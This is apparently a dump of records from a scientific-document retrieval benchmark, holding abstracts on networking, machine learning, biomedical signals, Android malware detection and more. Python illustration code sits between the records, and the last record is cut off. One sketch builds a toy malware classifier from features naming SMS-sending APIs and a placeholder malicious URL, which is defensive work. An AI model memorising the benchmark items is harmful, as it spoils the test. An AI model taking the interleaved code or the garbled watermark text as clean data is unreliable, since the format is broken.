"text": "A plethora of enabling optical and wireless technologies have been emerging that can be used to build future-proof bimodal fiber-wireless (FiWi) broadband access networks. After overviewing key enabling radio-over-fiber (RoF) and radio-andfiber (R&F) technologies and briefly surveying the state of the art of FiWi networks, we introduce an Ethernet-based access-metro FiWi network, called SuperMAN, that integrates next-generation WiFi and WiMAX networks with WDM-enhanced EPON and RPR networks. Throughout the paper we pay close attention to the technical challenges and opportunities of FiWi networks, but also elaborate on their societal benefits and potential to shift the current research focus from optical-wireless networking to the exploitation of personal and in-home computing facilities to create new unforeseen services and applications as we are about to enter the Petabyte age.",
"title": ""
},
{
"docid": "80edb9c7e4bdaca1391ec671f7445381",
"text": "We propose an efficient multikernel adaptive filtering algorithm with double regularizers, providing a novel pathway towards online model selection and learning. The task is the challenging nonlinear adaptive filtering under no knowledge about a suitable kernel. Under this limited-knowledge assumption on an underlying model of a system of interest, many possible kernels are employed and one of the regularizers, a block ℓ1 norm for kernel groups, contributes to selecting a proper model (relevant kernels) in online and adaptive fashion, preventing a nonlinear filter from overfitting to noisy data. The other regularizer is the block ℓ1 norm for data groups, contributing to updating the dictionary adaptively. As the resulting cost function contains two nonsmooth (but proximable) terms, we approximate the latter regularizer by its Moreau envelope and apply the adaptive proximal forward-backward splitting method to the approximated cost function. Numerical examples show the efficacy of the proposed algorithm.",
"title": ""
},
{
"docid": "4c729baceae052361decd51321e0b5bc",
"text": "Learning to hash has attracted broad research interests in recent computer vision and machine learning studies, due to its ability to accomplish efficient approximate nearest neighbor search. However, the closely related task, maximum inner product search (MIPS), has rarely been studied in this literature. To facilitate the MIPS study, in this paper, we introduce a general binary coding framework based on asymmetric hash functions, named asymmetric inner-product binary coding (AIBC). In particular, AIBC learns two different hash functions, which can reveal the inner products between original data vectors by the generated binary vectors. Although conceptually simple, the associated optimization is very challenging due to the highly nonsmooth nature of the objective that involves sign functions. We tackle the nonsmooth optimization in an alternating manner, by which each single coding function is optimized in an efficient discrete manner. We also simplify the objective by discarding the quadratic regularization term which significantly boosts the learning efficiency. Both problems are optimized in an effective discrete way without continuous relaxations, which produces high-quality hash codes. In addition, we extend the AIBC approach to the supervised hashing scenario, where the inner products of learned binary codes are forced to fit the supervised similarities. Extensive experiments on several benchmark image retrieval databases validate the superiority of the AIBC approaches over many recently proposed hashing algorithms.",
"title": ""
},
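A rough sketch of the asymmetric idea from the AIBC abstract above: two different sign-of-projection hash functions, one for queries and one for database items, produce binary codes whose inner product stands in for the real-valued inner product. The projections here are random placeholders, not the learned matrices from the paper's discrete optimization, so the agreement is only approximate.

```python
import numpy as np

rng = np.random.default_rng(0)
d, b, n = 64, 256, 1000                 # data dim, code length, database size

# Two *different* hash functions (random projections standing in for learned ones).
Wq = rng.standard_normal((b, d)) / np.sqrt(d)
Wx = rng.standard_normal((b, d)) / np.sqrt(d)

X = rng.standard_normal((n, d))
q = rng.standard_normal(d)

Bx = np.sign(X @ Wx.T)                  # database codes (+-1), computed offline
bq = np.sign(Wq @ q)                    # query code from the other hash function

approx = Bx @ bq                        # binary surrogate for the inner products X @ q
exact = X @ q

best_approx = set(np.argsort(-approx)[:10])
best_exact = set(np.argsort(-exact)[:10])
print("top-10 overlap with exact MIPS:", len(best_approx & best_exact))
```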
{
"docid": "7084e2455ea696eec4a0f93b3140d71b",
"text": "Reinforcement learning is a simple, and yet, comprehensive theory of learning that simultaneously models the adaptive behavior of artificial agents, such as robots and autonomous software programs, as well as attempts to explain the emergent behavior of biological systems. It also gives rise to computational ideas that provide a powerful tool to solve problems involving sequential prediction and decision making. Temporal difference learning is the most widely used method to solve reinforcement learning problems, with a rich history dating back more than three decades. For these and many other reasons, devel1 This article is currently not under review for the journal Foundations and Trends in ML, but will be submitted for formal peer review at some point in the future, once the draft reaches a stable “equilibrium” state. ar X iv :1 40 5. 67 57 v1 [ cs .L G ] 2 6 M ay 2 01 4 oping a complete theory of reinforcement learning, one that is both rigorous and useful has been an ongoing research investigation for several decades. In this paper, we set forth a new vision of reinforcement learning developed by us over the past few years, one that yields mathematically rigorous solutions to longstanding important questions that have remained unresolved: (i) how to design reliable, convergent, and robust reinforcement learning algorithms (ii) how to guarantee that reinforcement learning satisfies pre-specified “safely” guarantees, and remains in a stable region of the parameter space (iii) how to design “off-policy” temporal difference learning algorithms in a reliable and stable manner, and finally (iv) how to integrate the study of reinforcement learning into the rich theory of stochastic optimization. In this paper, we provide detailed answers to all these questions using the powerful framework of proximal operators. The most important idea that emerges is the use of primal dual spaces connected through the use of a Legendre transform. This allows temporal difference updates to occur in dual spaces, allowing a variety of important technical advantages. The Legendre transform, as we show, elegantly generalizes past algorithms for solving reinforcement learning problems, such as natural gradient methods, which we show relate closely to the previously unconnected framework of mirror descent methods. Equally importantly, proximal operator theory enables the systematic development of operator splitting methods that show how to safely and reliably decompose complex products of gradients that occur in recent variants of gradient-based temporal difference learning. This key technical innovation makes it possible to finally design “true” stochastic gradient methods for reinforcement learning. Finally, Legendre transforms enable a variety of other benefits, including modeling sparsity and domain geometry. Our work builds extensively on recent work on the convergence of saddle-point algorithms, and on the theory of monotone operators in Hilbert spaces, both in optimization and for variational inequalities. The latter framework, the subject of another ongoing investigation by our group, holds the promise of an even more elegant framework for reinforcement learning. Its explication is currently the topic of a further monograph that will appear in due course. Dedicated to Andrew Barto and Richard Sutton for inspiring a generation of researchers to the study of reinforcement learning. 
Algorithm 1 TD (1984) (1) δt = rt + γφ ′ t T θt − φt θt (2) θt+1 = θt + βtδt Algorithm 2 GTD2-MP (2014) (1) wt+ 1 2 = wt + βt(δt − φt wt)φt, θt+ 1 2 = proxαth ( θt + αt(φt − γφt)(φt wt) ) (2) δt+ 1 2 = rt + γφ ′ t T θt+ 1 2 − φt θt+ 1 2 (3) wt+1 = wt + βt(δt+ 1 2 − φt wt+ 1 2 )φt , θt+1 = proxαth ( θt + αt(φt − γφt)(φt wt+ 1 2 ) )",
"title": ""
},
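A minimal sketch of the two updates quoted in the passage above, with linear (here tabular) features on a toy deterministic chain. The environment, the step sizes, and the simplification that the proximal map of h = 0 is the identity are all assumptions; the sketch only shows the shape of the TD and GTD2-style iterations, not the paper's full mirror-descent machinery.

```python
import numpy as np

n_states, d, gamma = 5, 5, 0.9
phi = np.eye(n_states)                  # tabular features for a toy 5-state chain

def step(s):
    # Toy chain: move right; reward 1 only on reaching the last (terminal) state.
    s2 = min(s + 1, n_states - 1)
    return (1.0 if s2 == n_states - 1 else 0.0), s2

theta_td = np.zeros(d)
theta, w = np.zeros(d), np.zeros(d)     # GTD2 keeps a second weight vector w
alpha = beta = 0.05

for episode in range(500):
    s = 0
    while s != n_states - 1:
        r, s2 = step(s)
        f, f2 = phi[s], phi[s2]

        # Algorithm 1: TD(0).  delta = r + gamma * phi'^T theta - phi^T theta
        delta = r + gamma * f2 @ theta_td - f @ theta_td
        theta_td += beta * delta * f

        # Algorithm 2 (simplified GTD2-style step; prox of h = 0 is the identity).
        delta_g = r + gamma * f2 @ theta - f @ theta
        w += beta * (delta_g - f @ w) * f
        theta += alpha * (f - gamma * f2) * (f @ w)
        s = s2

print("TD value estimates:  ", np.round(phi @ theta_td, 2))
print("GTD2 value estimates:", np.round(phi @ theta, 2))
```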
{
"docid": "6831c633bf7359b8d22296b52a9a60b8",
"text": "The paper presents a system, Heart Track, which aims for automated ECG (Electrocardiogram) analysis. Different modules and algorithms which are proposed and used for implementing the system are discussed. The ECG is the recording of the electrical activity of the heart and represents the depolarization and repolarization of the heart muscle cells and the heart chambers. The electrical signals from the heart are measured non-invasively using skin electrodes and appropriate electronic measuring equipment. ECG is measured using 12 leads which are placed at specific positions on the body [2]. The required data is converted into ECG curve which possesses a characteristic pattern. Deflections from this normal ECG pattern can be used as a diagnostic tool in medicine in the detection of cardiac diseases. Diagnosis of large number of cardiac disorders can be predicted from the ECG waves wherein each component of the ECG wave is associated with one or the other disorder. This paper concentrates entirely on detection of Myocardial Infarction, hence only the related components (ST segment) of the ECG wave are analyzed.",
"title": ""
},
{
"docid": "5757d96fce3e0b3b3303983b15d0030d",
"text": "Malicious applications pose a threat to the security of the Android platform. The growing amount and diversity of these applications render conventional defenses largely ineffective and thus Android smartphones often remain unprotected from novel malware. In this paper, we propose DREBIN, a lightweight method for detection of Android malware that enables identifying malicious applications directly on the smartphone. As the limited resources impede monitoring applications at run-time, DREBIN performs a broad static analysis, gathering as many features of an application as possible. These features are embedded in a joint vector space, such that typical patterns indicative for malware can be automatically identified and used for explaining the decisions of our method. In an evaluation with 123,453 applications and 5,560 malware samples DREBIN outperforms several related approaches and detects 94% of the malware with few false alarms, where the explanations provided for each detection reveal relevant properties of the detected malware. On five popular smartphones, the method requires 10 seconds for an analysis on average, rendering it suitable for checking downloaded applications directly on the device.",
"title": ""
},
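An illustrative sketch of the DREBIN-style pipeline described above: string features from static analysis are embedded in a joint binary vector space, a linear SVM separates malware from benign apps, and per-feature weight contributions explain each decision. The feature strings, labels, and data are toy placeholders; the real system extracts features from APK manifests and dex code, which is not reproduced here.

```python
import numpy as np
from sklearn.feature_extraction import DictVectorizer
from sklearn.svm import LinearSVC

# Pretend feature sets from static analysis (permissions, API calls, URLs, ...).
apps = [
    {"perm::SEND_SMS": 1, "api::sendTextMessage": 1, "url::evil.example": 1},
    {"perm::INTERNET": 1, "api::HttpURLConnection": 1},
    {"perm::SEND_SMS": 1, "api::getDeviceId": 1, "api::sendTextMessage": 1},
    {"perm::ACCESS_FINE_LOCATION": 1, "api::getLastKnownLocation": 1},
]
labels = np.array([1, 0, 1, 0])                     # 1 = malware, 0 = benign (toy labels)

vec = DictVectorizer(sparse=True)                   # joint binary vector space
X = vec.fit_transform(apps)

clf = LinearSVC(C=1.0)
clf.fit(X, labels)

# Explanation: per-feature contributions w_k * x_k for one app, in the spirit of DREBIN's reports.
x = X[0].toarray().ravel()
contrib = clf.coef_.ravel() * x
for k in np.argsort(-contrib)[:3]:
    print(vec.feature_names_[k], round(contrib[k], 3))
```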
{
"docid": "b03ae1c57ed0e5c49fb99a8232d694d6",
"text": "Introduction The Neolithic Hongshan Culture flourished between 4500 and 3000 BCE in what is today northeastern China and Inner Mongolia (Figure 1). Village sites are found in the northern part of the region, while the two ceremonial sites of Dongshanzui and Niuheliang are located in the south, where villages are fewer (Guo 1995, Li 2003). The Hongshan inhabitants included agriculturalists who cultivated millet and pigs for subsistence, and accomplished artisans who carved finely crafted jades and made thin black-on-red pottery. Organized labor of a large number of workers is suggested by several impressive constructions, including an artificial hill containing three rings of marble-like stone, several high cairns with elaborate interiors and a 22 meter long building which contained fragments of life-sized statues. One fragment was a face with inset green jade eyes (Figure 2). A ranked society is implied by the burials, which include decorative jades made in specific, possibly iconographic, shapes. It has been argued previously that the sizes and locations of the mounded tombs imply at least three elite ranks (Nelson 1996).",
"title": ""
},
{
"docid": "46e81dc6b3b32f61471b91f71672a80f",
"text": "The sparsity of images in a fixed analytic transform domain or dictionary such as DCT or Wavelets has been exploited in many applications in image processing including image compression. Recently, synthesis sparsifying dictionaries that are directly adapted to the data have become popular in image processing. However, the idea of learning sparsifying transforms has received only little attention. We propose a novel problem formulation for learning doubly sparse transforms for signals or image patches. These transforms are a product of a fixed, fast analytic transform such as the DCT, and an adaptive matrix constrained to be sparse. Such transforms can be learnt, stored, and implemented efficiently. We show the superior promise of our approach as compared to analytical sparsifying transforms such as DCT for image representation.",
"title": ""
}
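A sketch of the representation idea in the abstract above: the transform is a sparse matrix times a fast analytic 2-D DCT, and sparse coding in a transform model reduces to hard thresholding of the transformed patches. The sparse factor here is a random perturbation of the identity standing in for the learned matrix; the actual learning formulation is not reproduced.

```python
import numpy as np
from scipy.fftpack import dct

patch_size, n_patches, sparsity = 8, 500, 10
rng = np.random.default_rng(0)

# 2-D DCT on vectorized 8x8 patches as the fast analytic part W0.
D1 = dct(np.eye(patch_size), norm="ortho", axis=0)
W0 = np.kron(D1, D1)                                  # 64 x 64 separable 2-D DCT

# Sparse adaptive factor B (random here, standing in for the learned matrix).
B = np.eye(W0.shape[0])
idx = rng.integers(0, 64, size=(64, 2))
B[idx[:, 0], idx[:, 1]] += 0.1 * rng.standard_normal(64)

W = B @ W0                                            # "doubly sparse" transform

patches = rng.standard_normal((n_patches, patch_size ** 2))
coeffs = patches @ W.T

# Sparse coding under a transform model: keep the largest-magnitude coefficients.
thresh = np.partition(np.abs(coeffs), -sparsity, axis=1)[:, -sparsity][:, None]
sparse_codes = np.where(np.abs(coeffs) >= thresh, coeffs, 0.0)
print("avg nonzeros per patch:", (sparse_codes != 0).sum(1).mean())
```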
] | scidocsrr |
c0103d497890c4d25b49e8012a051aad | Student engagement and foreign language learning through online social networks | [
{
"docid": "03368de546daf96d5111325f3d08fd3d",
"text": "Despite the widespread use of social media by students and its increased use by instructors, very little empirical evidence is available concerning the impact of social media use on student learning and engagement. This paper describes our semester-long experimental study to determine if using Twitter – the microblogging and social networking platform most amenable to ongoing, public dialogue – for educationally relevant purposes can impact college student engagement and grades. A total of 125 students taking a first year seminar course for pre-health professional majors participated in this study (70 in the experimental group and 55 in the control group). With the experimental group, Twitter was used for various types of academic and co-curricular discussions. Engagement was quantified by using a 19-item scale based on the National Survey of Student Engagement. To assess differences in engagement and grades, we used mixed effects analysis of variance (ANOVA) models, with class sections nested within treatment groups. We also conducted content analyses of samples of Twitter exchanges. The ANOVA results showed that the experimental group had a significantly greater increase in engagement than the control group, as well as higher semester grade point averages. Analyses of Twitter communications showed that students and faculty were both highly engaged in the learning process in ways that transcended traditional classroom activities. This study provides experimental evidence that Twitter can be used as an educational tool to help engage students and to mobilize faculty into a more active and participatory role.",
"title": ""
}
] | [
{
"docid": "ce3d82fc815a965a66be18d20434e80f",
"text": "In this paper the three-phase grid connected inverter has been investigated. The inverter’s control strategy is based on the adaptive hysteresis current controller. Inverter connects the DG (distributed generation) source to the grid. The main advantages of this method are constant switching frequency, better current control, easy filter design and less THD (total harmonic distortion). Since a constant and ripple free dc bus voltage is not ensured at the output of alternate energy sources, the main aim of the proposed algorithm is to make the output of the inverter immune to the fluctuations in the dc input voltage This inverter can be used to connect the medium and small-scale wind turbines and solar cells to the grid and compensate local load reactive power. Reactive power compensating improves SUF (system usage factor) from nearly 20% (in photovoltaic systems) to 100%. The simulation results confirm that switching frequency is constant and THD of injected current is low.",
"title": ""
},
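A toy single-phase simulation of a fixed-band hysteresis current controller tracking a sinusoidal reference through an R-L load, to illustrate the control principle named in the abstract above. All circuit values are assumptions, and the adaptive band calculation that keeps the switching frequency constant (the paper's contribution) is only indicated by a comment, not implemented.

```python
import numpy as np

# Single-phase R-L load driven by a two-level leg: v = +Vdc/2 or -Vdc/2.
Vdc, R, L = 400.0, 1.0, 5e-3
f_ref, I_ref, band = 50.0, 10.0, 0.5          # fixed band; the paper adapts it each step
dt, T = 1e-6, 0.04

t = np.arange(0.0, T, dt)
i_ref = I_ref * np.sin(2 * np.pi * f_ref * t)
i = np.zeros_like(t)
state = 1                                      # 1 -> upper switch on, 0 -> lower switch on
switchings = 0

for k in range(1, len(t)):
    err = i[k - 1] - i_ref[k - 1]
    if err > band and state == 1:              # current too high -> switch low
        state, switchings = 0, switchings + 1
    elif err < -band and state == 0:           # current too low  -> switch high
        state, switchings = 1, switchings + 1
    v = Vdc / 2 if state else -Vdc / 2
    # Forward-Euler update of di/dt = (v - R*i) / L.
    i[k] = i[k - 1] + dt * (v - R * i[k - 1]) / L
    # An *adaptive* band would be recomputed here from Vdc, L, and di_ref/dt
    # so that the switching frequency stays constant (not implemented).

print("approx. switching frequency [kHz]:", switchings / 2 / T / 1e3)
```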
{
"docid": "1f4ccaef3ff81f9680b152a3e7b3d178",
"text": "We propose a method for forecasting high-dimensional data (hundreds of attributes, trillions of attribute combinations) for a duration of several months. Our motivating application is guaranteed display advertising, a multi-billion dollar industry, whereby advertisers can buy targeted (high-dimensional) user visits from publishers many months or even years in advance. Forecasting high-dimensional data is challenging because of the many possible attribute combinations that need to be forecast. To address this issue, we propose a method whereby only a sub-set of attribute combinations are explicitly forecast and stored, while the other combinations are dynamically forecast on-the-fly using high-dimensional attribute correlation models. We evaluate various attribute correlation models, from simple models that assume the independence of attributes to more sophisticated sample-based models that fully capture the correlations in a high-dimensional space. Our evaluation using real-world display advertising data sets shows that fully capturing high-dimensional correlations leads to significant forecast accuracy gains. A variant of the proposed method has been implemented in the context of Yahoo!'s guaranteed display advertising system.",
"title": ""
},
{
"docid": "291c0e0936335f8de3b3944a97b47e25",
"text": "The k-nearest neighbor (k-NN) is a traditional method and one of the simplest methods for classification problems. Even so, results obtained through k-NN had been promising in many different fields. Therefore, this paper presents the study on blasts classifying in acute leukemia into two major forms which are acute myelogenous leukemia (AML) and acute lymphocytic leukemia (ALL) by using k-NN. 12 main features that represent size, color-based and shape were extracted from acute leukemia blood images. The k values and distance metric of k-NN were tested in order to find suitable parameters to be applied in the method of classifying the blasts. Results show that by having k = 4 and applying cosine distance metric, the accuracy obtained could reach up to 80%. Thus, k-NN is applicable in the classification problem.",
"title": ""
},
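A minimal sketch of the classifier configuration reported in the passage above (k = 4 with cosine distance), applied to synthetic stand-ins for the 12 size/colour/shape features. The data and labels are fabricated placeholders, not the blood-image features from the study.

```python
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier

rng = np.random.default_rng(0)

# Stand-in for the 12 size/colour/shape features per blast image (not real data).
X_all = rng.normal(size=(100, 12)) + np.repeat([[0.0], [1.0]], 50, axis=0)
y_all = np.repeat([0, 1], 50)                      # 0 = ALL, 1 = AML (toy labels)

# k = 4 with cosine distance, the setting reported to work best in the passage.
clf = KNeighborsClassifier(n_neighbors=4, metric="cosine")
scores = cross_val_score(clf, X_all, y_all, cv=5)
print("mean cross-validated accuracy:", scores.mean())
```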
{
"docid": "c599b08e2a2ff9bab4caf1fc1b1ed51c",
"text": "The quantification of the spectral content of electroencephalogram (EEG) recordings has a substantial role in clinical and scientific applications. It is of particular relevance in the analysis of event-related brain oscillatory responses. This work is focused on the identification and quantification of relevant frequency patterns in motor imagery (MI) related EEGs utilized for brain-computer interface (BCI) purposes. The main objective of the paper is to perform comparative analysis of different approaches to spectral signal representation such as power spectral density (PSD) techniques, atomic decompositions, time-frequency (t-f) energy distributions, continuous and discrete wavelet approaches, from which band power features can be extracted and used in the framework of MI classification. The emphasis is on identifying discriminative properties of the feature sets representing EEG trials recorded during imagination of either left- or right-hand movement. Feature separability is quantified in the offline study using the classification accuracy (CA) rate obtained with linear and nonlinear classifiers. PSD approaches demonstrate the most consistent robustness and effectiveness in extracting the distinctive spectral patterns for accurately discriminating between left and right MI induced EEGs. This observation is based on an analysis of data recorded from eleven subjects over two sessions of BCI experiments. In addition, generalization capabilities of the classifiers reflected in their intersession performance are discussed in the paper.",
"title": ""
},
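A sketch of the PSD-based band-power features discussed in the abstract above: Welch spectra of two channels are reduced to log band powers in the mu and beta bands and fed to a linear discriminant classifier. The sampling rate, band limits, synthetic trials, and classifier choice are all assumptions for illustration, not the study's exact protocol.

```python
import numpy as np
from scipy.signal import welch
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

fs, n_trials, n_samples = 250, 60, 1000             # 4-second trials at 250 Hz (assumed)
bands = [(8, 12), (18, 26)]                          # mu and beta bands (assumed)
rng = np.random.default_rng(0)

def band_power(trial, lo, hi):
    f, pxx = welch(trial, fs=fs, nperseg=256)
    return np.log(pxx[(f >= lo) & (f <= hi)].mean())

# Synthetic two-channel trials: class 1 gets extra 10 Hz power on channel 0,
# a crude stand-in for lateralized motor-imagery rhythms.
X, y = [], []
for k in range(n_trials):
    label = k % 2
    trials = rng.standard_normal((2, n_samples))
    if label:
        trials[0] += 2 * np.sin(2 * np.pi * 10 * np.arange(n_samples) / fs)
    X.append([band_power(trials[ch], lo, hi) for ch in range(2) for lo, hi in bands])
    y.append(label)

clf = LinearDiscriminantAnalysis()
print("training accuracy:", clf.fit(X, y).score(X, y))
```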
{
"docid": "2a28c82026952e347406b9996b54383f",
"text": "In the last decade there has been a shift towards development of speech synthesizer using concatenative synthesis technique instead of parametric synthesis. There are a number of different methodologies for concatenative synthesis like TDPSOLA, PSOLA, and MBROLA. This paper, describes a concatenative speech synthesis system based on Epoch Synchronous Non Over Lapp Add (ESNOLA) technique, for standard colloquial Bengali, which uses the partnemes as the smallest signal units for concatenation. The system provided full control for prosody and intonation.",
"title": ""
},
{
"docid": "2eab78b8ec65340be1473086f31eb8c4",
"text": "We present a new family of join algorithms, called ripple joins, for online processing of multi-table aggregation queries in a relational database management system (DBMS). Such queries arise naturally in interactive exploratory decision-support applications.\nTraditional offline join algorithms are designed to minimize the time to completion of the query. In contrast, ripple joins are designed to minimize the time until an acceptably precise estimate of the query result is available, as measured by the length of a confidence interval. Ripple joins are adaptive, adjusting their behavior during processing in accordance with the statistical properties of the data. Ripple joins also permit the user to dynamically trade off the two key performance factors of on-line aggregation: the time between successive updates of the running aggregate, and the amount by which the confidence-interval length decreases at each update. We show how ripple joins can be implemented in an existing DBMS using iterators, and we give an overview of the methods used to compute confidence intervals and to adaptively optimize the ripple join “aspect-ratio” parameters. In experiments with an initial implementation of our algorithms in the POSTGRES DBMS, the time required to produce reasonably precise online estimates was up to two orders of magnitude smaller than the time required for the best offline join algorithms to produce exact answers.",
"title": ""
},
{
"docid": "5da1f7c3459b489564e731cbb41fa028",
"text": "We describe an algorithm and experimental work for vehicle detection using sensor node data. Both acoustic and magnetic signals are processed for vehicle detection. We propose a real-time vehicle detection algorithm called the adaptive threshold algorithm (ATA). The algorithm first computes the time-domain energy distribution curve and then slices the energy curve using a threshold updated adaptively by some decision states. Finally, the hard decision results from threshold slicing are passed to a finite-state machine, which makes the final vehicle detection decision. Real-time tests and offline simulations both demonstrate that the proposed algorithm is effective.",
"title": ""
},
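A toy illustration of the adaptive-threshold idea named in the passage above (ATA): short-time energy of the signal is compared with a threshold derived from a running noise estimate, and a simple on/off state gates the detections. The threshold factor, noise-update rule, and synthetic signal are assumptions; the paper's actual decision states are not reproduced.

```python
import numpy as np

rng = np.random.default_rng(0)
fs, frame = 1000, 50                                 # 1 kHz samples, 50-sample frames

# Synthetic acoustic/magnetic signal: background noise with a vehicle "passing" in the middle.
sig = 0.1 * rng.standard_normal(10_000)
sig[4000:6000] += np.hanning(2000) * rng.standard_normal(2000)

energy = np.array([np.mean(f ** 2) for f in sig.reshape(-1, frame)])

noise, detections, inside = energy[:5].mean(), [], False
for k, e in enumerate(energy):
    thresh = 3.0 * noise                             # adaptive threshold (assumed factor)
    if not inside and e > thresh:
        inside = True
        detections.append(k * frame / fs)            # detection onset in seconds
    elif inside and e < thresh:
        inside = False
    if e <= thresh:                                   # update noise estimate only outside events
        noise = 0.99 * noise + 0.01 * e

print("detection onsets (s):", detections)
```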
{
"docid": "c453861bda83e4120687832bfa033d23",
"text": "Text generation is a crucial task in NLP. Recently, several adversarial generative models have been proposed to improve the exposure bias problem in text generation. Though these models gain great success, they still suffer from the problems of reward sparsity and mode collapse. In order to address these two problems, in this paper, we employ inverse reinforcement learning (IRL) for text generation. Specifically, the IRL framework learns a reward function on training data, and then an optimal policy to maximum the expected total reward. Similar to the adversarial models, the reward and policy function in IRL are optimized alternately. Our method has two advantages: (1) the reward function can produce more dense reward signals. (2) the generation policy, trained by “entropy regularized” policy gradient, encourages to generate more diversified texts. Experiment results demonstrate that our proposed method can generate higher quality texts than the previous methods.",
"title": ""
},
{
"docid": "17ae594d70605bc24fb3b2e4a63e5d78",
"text": "Mobile phones have been closed environments until recent years. The change brought by open platform technologies such as the Symbian operating system and Java technologies has opened up a significant business opportunity for anyone to develop application software such as games for mobile terminals. However, developing mobile applications is currently a challenging task due to the specific demands and technical constraints of mobile development. Furthermore, at the moment very little is known about the suitability of the different development processes for mobile application development. Due to these issues, we have developed an agile development approach called Mobile-D. The Mobile-D approach is briefly outlined here and the experiences gained from four case studies are discussed.",
"title": ""
},
{
"docid": "1e9e64a89947c08f8ce298d7e0de4183",
"text": "This paper proposes a novel architecture for plug-in electric vehicles (PEVs) dc charging station at the megawatt level, through the use of a grid-tied neutral point clamped (NPC) converter. The proposed bipolar dc structure reduces the step-down effort on the dc-dc fast chargers. In addition, this paper proposes a balancing mechanism that allows handling any difference on the dc loads while keeping the midpoint voltage accurately regulated. By formally defining the unbalance operation limit, the proposed control scheme is able to provide complementary balancing capabilities by the use of an additional NPC leg acting as a bidirectional dc-dc stage, simulating the minimal load condition and allowing the modulator to keep the control on the dc voltages under any load scenario. The proposed solution enables fast charging for PEVs concentrating several charging units into a central grid-tied converter. In this paper, simulation and experimental results are presented to validate the proposed charging station architecture.",
"title": ""
},
{
"docid": "4ddf4cf69d062f7ea1da63e68c316f30",
"text": "The Di†use Infrared Background Experiment (DIRBE) on the Cosmic Background Explorer (COBE) spacecraft was designed primarily to conduct a systematic search for an isotropic cosmic infrared background (CIB) in 10 photometric bands from 1.25 to 240 km. The results of that search are presented here. Conservative limits on the CIB are obtained from the minimum observed brightness in all-sky maps at each wavelength, with the faintest limits in the DIRBE spectral range being at 3.5 km (lIl \\ 64 nW m~2 sr~1, 95% conÐdence level) and at 240 km nW m~2 sr~1, 95% conÐdence level). The (lIl\\ 28 bright foregrounds from interplanetary dust scattering and emission, stars, and interstellar dust emission are the principal impediments to the DIRBE measurements of the CIB. These foregrounds have been modeled and removed from the sky maps. Assessment of the random and systematic uncertainties in the residuals and tests for isotropy show that only the 140 and 240 km data provide candidate detections of the CIB. The residuals and their uncertainties provide CIB upper limits more restrictive than the dark sky limits at wavelengths from 1.25 to 100 km. No plausible solar system or Galactic source of the observed 140 and 240 km residuals can be identiÐed, leading to the conclusion that the CIB has been detected at levels of and 14^ 3 nW m~2 sr~1 at 140 and 240 km, respectively. The intelIl\\ 25 ^ 7 grated energy from 140 to 240 km, 10.3 nW m~2 sr~1, is about twice the integrated optical light from the galaxies in the Hubble Deep Field, suggesting that star formation might have been heavily enshrouded by dust at high redshift. The detections and upper limits reported here provide new constraints on models of the history of energy-releasing processes and dust production since the decoupling of the cosmic microwave background from matter. Subject headings : cosmology : observations È di†use radiation È infrared : general",
"title": ""
},
{
"docid": "e812afed86c4481c70cb80985cc3dc13",
"text": "Viruses that cause chronic infection constitute a stable but little-recognized part of our metagenome: our virome. Ongoing immune responses hold these chronic viruses at bay while avoiding immunopathologic damage to persistently infected tissues. The immunologic imprint generated by these responses to our virome defines the normal immune system. The resulting dynamic but metastable equilibrium between the virome and the host can be dangerous, benign, or even symbiotic. These concepts require that we reformulate how we assign etiologies for diseases, especially those with a chronic inflammatory component, as well as how we design and interpret genome-wide association studies, and how we vaccinate to limit or control our virome.",
"title": ""
},
{
"docid": "4e2fbac1742c7afe9136e274150d6ee9",
"text": "Recently, knowledge graph embedding, which projects symbolic entities and relations into continuous vector space, has become a new, hot topic in artificial intelligence. This paper addresses a new issue of multiple relation semantics that a relation may have multiple meanings revealed by the entity pairs associated with the corresponding triples, and proposes a novel generative model for embedding, TransG. The new model can discover latent semantics for a relation and leverage a mixture of relation-specific component vectors to embed a fact triple. To the best of our knowledge, this is the first generative model for knowledge graph embedding, which is able to deal with multiple relation semantics. Extensive experiments show that the proposed model achieves substantial improvements against the state-of-the-art baselines.",
"title": ""
},
{
"docid": "35553625596fe1e467242c257ed64ebd",
"text": "We present an incremental joint framework to simultaneously extract entity mentions and relations using structured perceptron with efficient beam-search. A segment-based decoder based on the idea of semi-Markov chain is adopted to the new framework as opposed to traditional token-based tagging. In addition, by virtue of the inexact search, we developed a number of new and effective global features as soft constraints to capture the interdependency among entity mentions and relations. Experiments on Automatic Content Extraction (ACE)1 corpora demonstrate that our joint model significantly outperforms a strong pipelined baseline, which attains better performance than the best-reported end-to-end system.",
"title": ""
},
{
"docid": "371be25b5ae618c599e551784641bbcb",
"text": "The paper presents proposal of practical implementation simple IoT gateway based on Arduino microcontroller, dedicated to use in home IoT environment. Authors are concentrated on research of performance and security aspects of created system. By performed load tests and denial of service attack were investigated performance and capacity limits of implemented gateway.",
"title": ""
},
{
"docid": "24297f719741f6691e5121f33bafcc09",
"text": "The hypothesis that cancer is driven by tumour-initiating cells (popularly known as cancer stem cells) has recently attracted a great deal of attention, owing to the promise of a novel cellular target for the treatment of haematopoietic and solid malignancies. Furthermore, it seems that tumour-initiating cells might be resistant to many conventional cancer therapies, which might explain the limitations of these agents in curing human malignancies. Although much work is still needed to identify and characterize tumour-initiating cells, efforts are now being directed towards identifying therapeutic strategies that could target these cells. This Review considers recent advances in the cancer stem cell field, focusing on the challenges and opportunities for anticancer drug discovery.",
"title": ""
},
{
"docid": "da9751e8db176942da1c582908942ce3",
"text": "This paper introduces new types of square-piece jigsaw puzzles: those for which the orientation of each jigsaw piece is unknown. We propose a tree-based reassembly that greedily merges components while respecting the geometric constraints of the puzzle problem. The algorithm has state-of-the-art performance for puzzle assembly, whether or not the orientation of the pieces is known. Our algorithm makes fewer assumptions than past work, and success is shown even when pieces from multiple puzzles are mixed together. For solving puzzles where jigsaw piece location is known but orientation is unknown, we propose a pairwise MRF where each node represents a jigsaw piece's orientation. Other contributions of the paper include an improved measure (MGC) for quantifying the compatibility of potential jigsaw piece matches based on expecting smoothness in gradient distributions across boundaries.",
"title": ""
},
{
"docid": "9c1d8f50bd46f7c7b6e98c3c61edc67d",
